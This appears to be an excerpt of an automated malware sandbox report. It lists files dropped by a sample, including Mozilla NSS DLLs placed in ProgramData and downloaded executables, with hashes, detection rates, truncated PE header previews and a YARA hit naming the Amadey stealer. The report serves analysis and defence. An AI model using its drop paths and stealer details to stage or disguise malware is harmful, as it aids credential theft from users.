Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.5.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E59.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4640
Entropy (8bit):	4.496321091465538
Encrypted:	false
SSDEEP:	48:cvIwWl8zseJg77aI9zgWpW8VYHYm8M4JFpJFoEq+q8/vsMOd4d:uIjfUI7RZ7VfJ0V7d4d
MD5:	68887CAA07768EB1CF6F5F1CD21A03F8
SHA1:	BC60510F3B6D8B215297018C3CC2D5A21CDEF413
SHA-256:	668824C49AFE8F5947C6FFB0C8ED489BE5990807558EA11D77581B1A37610EAA
SHA-512:	D6E0A5FFD0D4AD9CE49BD6AB0DB359E0A4A56DFAF6AA94AFF3B6C09F448379E2D4B801EE0E186B7EB818AE8BCE6E63AE184722D4830F5DB8F8ACF458CD06D945
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="385723" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EC6.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	89390
Entropy (8bit):	3.0516401662677333
Encrypted:	false
SSDEEP:	1536:7SNvPcx1XdbYoI0KVbfFViY+bZ3M5Ii5/PelVMSxfP8XJDckVAfnTZTLuJtAmdKG:7SNvPcx1XdbYoI0KVbfFViTHc9+Gz+VW
MD5:	1387814B61B8C34CCA57FAA9430F8AA2
SHA1:	5296E569AD91956D80037B84D9D831B48429E4C3
SHA-256:	378A61A42E7D8E34014D559B3505F9F9263E7AF6E17C8AE464DF8ACAFCCF926C
SHA-512:	3831C3D3FD7F668A38C3A852B09BE4690F9F53D671BC1F9445E29914164E45ADE32B981D44D7BEF7B9876F3263DCFB8A806D9469A6450E16F2A98D8643BFE9FA
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9177.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6929993551642437
Encrypted:	false
SSDEEP:	96:TiZYWKmXWBdYFY49WQHjYEZNgtHipVfrnwJCBraafpMvQhI6WF:2ZDoC/wCdaafpMvQe6WF
MD5:	62BADEB542516F43B3DBD1D009B3EA4B
SHA1:	71828ED71121B454B71F6B6ED9A3727CC01500C6
SHA-256:	0D202FC9996FB5BE8D52F366D0D8D22599053869F5B71FB3C66D9EFF9A91C04F
SHA-512:	7BC2CDA97944402117FACADBFC9CFE9AE9746FAB43731494C51BA8FD6C867070D5EB0183D875DAC234D1132D15C29A6697BE588B6E444810E7A6A8876CC6ADE1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AADJTHAWWR.exe, Detection: malicious, Browse Filename: wqmnYoVbHr.exe, Detection: malicious, Browse Filename: EZrw1nNIpG.exe, Detection: malicious, Browse Filename: KgXj6BW5dZ.exe, Detection: malicious, Browse Filename: T8TLibvQ1C.exe, Detection: malicious, Browse Filename: HWyC5T1f8a.exe, Detection: malicious, Browse Filename: DqnftBv2b9.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: 75MwheiQ7I.exe, Detection: malicious, Browse Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: AADJTHAWWR.exe, Detection: malicious, Browse Filename: wqmnYoVbHr.exe, Detection: malicious, Browse Filename: EZrw1nNIpG.exe, Detection: malicious, Browse Filename: KgXj6BW5dZ.exe, Detection: malicious, Browse Filename: T8TLibvQ1C.exe, Detection: malicious, Browse Filename: HWyC5T1f8a.exe, Detection: malicious, Browse Filename: DqnftBv2b9.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: 75MwheiQ7I.exe, Detection: malicious, Browse Filename: ljwIPDSwFi.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\123.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000110001\123.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	3FD5C0634443FB2EF2796B9636159CB6
SHA1:	366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
SHA-256:	58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
SHA-512:	8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1Vkf7silOj.exe.log

Download File

Process:	C:\Users\user\Desktop\1Vkf7silOj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Explorers.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TpWWMUpe0LEV.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.51614449175576
Encrypted:	false
SSDEEP:	12288:pfSPtGpmLb84Jjzo6yrBuKuJ+ITOClUd:ktGpmf8edykhVlUd
MD5:	C4AEAAFC0507785736E000FF7E823F5E
SHA1:	B1ACDEE835F02856985A822FE99921B097ED1519
SHA-256:	B1D5B1E480A5731CAACC65609EAF069622F1129965819079AA09BC9D96DADDE5
SHA-512:	FBAEFBCE3232481490BCE7B859C6C1BAFD87EE6D952A2BE9BF7C4ED25FE8FC9AFF46C2246E247AA05CE8E405831A5905CA366C5333EDE0AF48F9A6287479A12D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....rf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\whiteheroin[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	1228288
Entropy (8bit):	7.788501679241677
Encrypted:	false
SSDEEP:	24576:vjOwtWBrHdDD2PVc1ZQBQkoTjPCpKTbzMxaZc+zrUmz:vCwtW9dDyPyz6DMPCMTbzdZc+kmz
MD5:	242214131486132E33CEDA794D66CA1F
SHA1:	4CE34FD91F5C9E35B8694007B286635663EF9BF2
SHA-256:	BAC402B5749B2DA2211DB6D2404C1C621CCD0C2E5D492EB6F973B3E2D38DD361
SHA-512:	031E0904D949CEC515F2D6F2B5E4B9C0DF03637787FF14F20C58E711C54EEC77D1F22AA0CF0F6EFD65362C1FC0066645D5D005C6A77FE5B169427CDD42555D29
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N\|f................................. ... ....@.. ....................... ............@.....................................K.................................................................................... ..................H............text........ ...................... ..`._LW......... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\1[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	324608
Entropy (8bit):	5.477406626373578
Encrypted:	false
SSDEEP:	3072:uuRL5Z0OG4ZT2jqCXr+9P9TlHp5Sn5ma9l2MyM8MITIk:7L/0ZkT22e6FTlHTShgMBk
MD5:	E1B59D2805B38262B9967BCE3E719DBF
SHA1:	4081416CFAA76941981C34518D45B60E8D4B2013
SHA-256:	D5BBA713D11EBBB7A91BE59DAE0F2D4B818897FE756B854DFE40BABE7664C173
SHA-512:	BCEA30A8F2A10AED0E2C97133734A34A850C18EE9447966ED8CDAE8BBF72B98EBD2703A7CADF53B8991EF5EB3047D871242E990A4B7BAF00EDA8CA5F5F7DDA35
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.7...YE..YE..YE...E*.YE...E..YE...Ez.YE/n"E..YE..XEx.YE...E..YE...E..YE...E..YERich..YE................PE..L....\Qd..........................................@.................................62......................................l...x.......h............................................................................................................text............................... ..`.rdata..............................@..@.data............b..................@....rsrc...h...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\alex5555555[1].exe

Download File

